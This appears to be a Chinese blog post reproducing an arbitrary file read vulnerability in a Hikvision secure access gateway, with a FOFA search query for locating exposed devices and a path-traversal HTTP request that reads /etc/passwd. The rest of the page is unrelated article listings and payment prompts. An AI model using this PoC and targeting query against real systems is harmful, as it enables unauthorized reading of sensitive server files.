海康威视安全接入网关 任意文件读取漏洞复现

最新推荐文章于 2025-07-04 10:07:51 发布
原创 最新推荐文章于 2025-07-04 10:07:51 发布 · 552 阅读 · 9 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全 #网络 #网络安全 #web安全 #运维

0x01 产品简介

海康威视安全接入网关是一种网络安全产品,旨在提供安全、可靠的远程访问和连接解决方案.

0x02 漏洞概述

海康威视安全接入网关使用Jquery-1.7.2 , 该版本存在任意文件读取漏洞,可获取服务器内部敏感信息泄露(安博通应用网关也存在此漏洞)

0x03 复现环境

FOFA:

(body="webui/js/jquerylib/jquery-1.7.2.min.js" && product="ABT-应用网关" || body="webui/js/jquerylib/jquery-1.7.2.min.js" && product="HIKVISION-安全网关")

![](https://img-

blog.csdnimg.cn/direct/de108cb8a0e14012a37f8f2702e73adf.png)0x04 漏洞复现

PoC

GET /webui/?file_name=../../../../../etc/passwd&g=sys_dia_data_down HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,z

学习计划安排

最低0.47元/天 解锁文章

新学期VIP享超值加赠
网安李李
关注
海康威视视频编码设备接入网关存在任意文件读取漏洞
nnn2188185的博客
04-27 965
海康威视是以视频为核心的智能物联网解决方案和大数据服务提供商。 杭州海康威视系统技术有限公司流媒体管理服务器存在任意文件读取漏洞
HIKVISION 视频编码设备接入网关 showFile.php 任意文件下载漏洞(含批量验证poc)
weixin_43567873的博客
03-29 418
HIKVISION 视频编码设备接入网关 showFile.php 任意文件下载漏洞
L2TP连接尝试失败,因为安全层在初始化与远程计算机的协商时遇到一个处理错误。
这是一个存放稳定方案的地方,分享的可能在其他人使用过程中存在某些问题,请到Q群 767508000 或私信与我联系。
01-09 1万+
L2TP连接尝试失败,因为安全层在初始化与远程计算机的协商时遇到一个处理错误。修复文件。
连接Sql Server时报错:无法通过使用安全套接字层加密与 SQL Server 建立安全连接
折翼的青鸟
01-19 1万+
项目之前在服务器上一直正常运行,今天突然报错,报错内容为:com.microsoft.sqlserver.jdbc.SQLServerException: “Encrypt”属性设置为“true”且 “trustServerCertificate”属性设置为“false”,但驱动程序无法使用安全套接字层 (SSL) 加密与 SQL Server 建立安全连接:错误:PKIX path building failed: sun.security.provider.certpath.SunCertPathBui
海康威视applyCT组件高危漏洞分析(CVE-2025-34067,CVSS 10.0):基于Fastjson的未授权远程代码执行
最新发布
FreeBuf_的博客
07-04 843
海康威视高危漏洞可致监控系统遭劫持,速修复。
com.microsoft.sqlserver.jdbc.SQLServerException: 驱动程序无法通过使用安全套接字层(SSL)加密与 SQL Server 建立 安全连接。
qq_45256805的博客
06-28 1万+
com.microsoft.sqlserver.jdbc.SQLServerException: 驱动程序无法通过使用安全套接字层(SSL)加密与 SQL Server 建立 安全连接。错误:The server selected protocol version TLS10 is not accepted by client preferences [TLS12]
sqlserver.jdbc.SQLServerException: 驱动程序无法通过使用安全套接字层(SSL)加密与 SQL Server 建立安全连接。错误:“sun.security.va
LastKnight12的博客
06-29 1397
是sqlserver的驱动版本不对,具体原因不清楚,总之自动配置10.2.1.jre8的驱动版本很容易出错,最后改成了6.2.0.jre8,连接成功。
com.microsoft.sqlserver.jdbc.SQLServerException: 驱动程序无法通过使用安全套接字层(SSL)加密与 SQL Server 建立 安全连接。错误:“SQL
xiaoguo321的专栏
09-29 1万+
部署项目的时候碰到一个特别头疼的问题,折腾了老娘一个礼拜才搞定,特此修文一篇,先把错误代码贴过来: Caused by: com.microsoft.sqlserver.jdbc.SQLServerException: 驱动程序无法通过使用安全套接字层(SSL)加密与 SQL Server 建立 安全连接。错误:“SQL Server 未返回响应。连接已关闭。 ClientConnection
(CNVD-2021-14544)海康威视流媒体管理服务器任意文件读取复现
ximo的博客
03-30 2892
简介 海康威视是以视频为核心的智能物联网解决方案和大数据服务提供商。 漏洞说明 杭州海康威视系统技术有限公司流媒体管理服务器存在弱口令漏洞任意文件读取漏洞,攻击者可利用该漏洞获取敏感信息。 漏洞复现 Fofa搜索标题: title="流媒体管理服务器" 找到存在弱口令的后台: admin/12345 在日志下载中进行抓包: 构造payload: ../../../../../../../windows/system32/drivers/etc/hosts 可进行下载。 ...
JDBC连接数据库遇到的”驱动程序无法通过使用安全套接字层(SSL)加密与 SQL Server 建立安全连接。错误:“SQL Server 未返回响应连接已关闭“问题解决方法!
热门推荐
m0_37808229的博客
12-20 1万+
这是为了解决JAVA中JDBC连接数据库遇到的“驱动程序无法通过使用安全套接字层(SSL)加密与 SQL Server 建立安全连接。”问题而记录的。 报错信息: com.microsoft.sqlserver.jdbc.SQLServerException: 驱动程序无法通过使用安全套接字层(SSL)加密与 SQL Server 建立安全连接。错误:“SQL Server 未返回响应。连...
驱动程序无法通过使用安全套接字层(SSL)加密与 SQL Server 建立安全连接
03-15
解决Could not generate DH keypair 和 Unsupported curveId :29问题
解决SQLSERVER数据库驱动程序无法通过使用安全套接字层(SSL)加密与 SQL Server 建立安全连接问题JAR包
06-23
用于解决SQLSERVER连接问题驱动程序无法通过使用安全套接字层(SSL)加密与 SQL Server 建立安全连接问题JAR包。
SQLSERVER数据库驱动程序无法通过使用安全套接字层(SSL)加密
10-11
解决SQLSERVER数据库驱动程序无法通过使用安全套接字层(SSL)加密与 SQL Server 建立安全连接问题JAR包
Google Chrome浏览器下载
04-18
Google Chrome浏览器下载,谷歌浏览器(Google Chrome)是谷歌公司开发的一款免费的网络浏览器。它拥有简洁的界面,机智的地址栏,强大的浏览选项和web应用扩展。Chrome 浏览器的目标是让上网变简单、快速和安全。 主要特性: • 速度极快:Chrome浏览器采用了极简主义的设计理念,页面加载速度很快,很好地兼顾了页面显示速度和系统资源占用。 • 安全稳定:Chrome浏览器内置了安全沙箱机制,避免恶意软件对用户系统的攻击,保证上网安全。并且定期自动更新,修复安全漏洞。 • 界面简洁:Chrome浏览器界面简单实用,主页干净利落,地址栏和搜索栏完美结合,提供更加直观的上网体验。 • 强大扩展:Chrome浏览器支持各种web应用扩展,用户可以根据个人需要自由安装与卸载,比如广告拦截,网页翻译等功能。 • 跨平台支持: Chrome浏览器支持Windows、Mac、Android、iOS多个平台,PC端和移动端同步数据与设置,使上网体验无缝切换。 • 数据同步:Chrome浏览器通过与Google账号绑定,实现上网浏览数据跨设备自动同步,不论在手机还是电脑上浏
Win7提示Internet阻止打开文件怎么办?Win7提示Internet阻止打开文件的解决方法
xhp618的博客
11-30 1540
的小伙伴在打开一些程序的时候会突然弹出“Internet安全设置阻止打开一个或多个文件”的窗口,那么遇到这种问题应该怎么办呢?下面小编就来教一教大家解决方法吧。4、在“安全设置-Internet区域”中将“加载应用程序和不安全文件”设置为“提示(推荐)”,并点击确定。1、打开ie浏览器,点击菜单栏中的“工具”或者是右上角的齿轮图标打开菜单,选择“Internet选项”;3、点击“Internet”,然后点击“自定义级别”按钮;2、然后切换到“安全”选项卡。
【已解决】连接VPN,报L2TP连接尝试失败,因为安全层在初始化与远程计算机协商时遇到一个处理错误
我热爱学习,也乐于分享。无论是科技前沿的洞见,还是生活中的小技巧,我都会在这里与你分享。我相信,知识就是力量,而分享则能让这份力量得到更好的传递。
08-02 1万+
你可以尝试暂时关闭防火墙(注意,这可能会降低系统安全性),然后重新尝试连接,以确定是否是防火墙导致的问题。如果可能,尝试使用其他VPN协议(如OpenVPN、IKEv2等)连接到远程服务器,以查看是否是L2TP协议本身的问题。有时,重新启动L2TP服务可以解决连接问题。步骤:按下Windows + R键,打开“运行”对话框,输入regedit并回车,打开注册表编辑器。如果你使用的是第三方防火墙软件,请检查其设置,确保它允许L2TP协议通过。选择你要连接的VPN,右键选择“属性”,然后选择“安全”选项卡。
sqlserver.jdbc.SQLServerException: 驱动程序无法通过使用安全套接字层(SSL)加密与 SQL Server 建立安全连接
Faye666666的博客
06-14 1690
springboot+mybatis+sqlserver进行开发时遇到下列问题: Cause: org.springframework.jdbc.CannotGetJdbcConnectionException: Failed to obtain JDBC Connection; nested exception is com.microsoft.sqlserver.jdbc.SQLServerException: 驱动程序无法通过使用安全套接字层(SSL)加密与 SQL Server 建立安全连接。错误:
Android连接com.microsoft.sqlserver.jdbc.SQLServerException: 驱动程序无法通过使用安全套接字层(SSL)加密与 SQL Server 建立安全连接
qq_36148463的博客
03-18 602
在网上找了很多方法,像什么加encrypt=false/true,加trustServerCertificate=true都没有用,最后看到有人用别的驱动就试了一下,成功了。最新版的android studio 2023挺好使,不用再加版本号了。使用 jTDS 驱动而不是JDBC。
海康威视摄像头接入手机演示教程
标题中提到的“海康威视摄像头手机接入的demo”指的是一个演示程序(demo),它是用来展示如何将海康威视(Hikvision)品牌的网络摄像头接入到手机设备中。这样的demo通常被用作开发者的教学工具,帮助他们理解整个...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值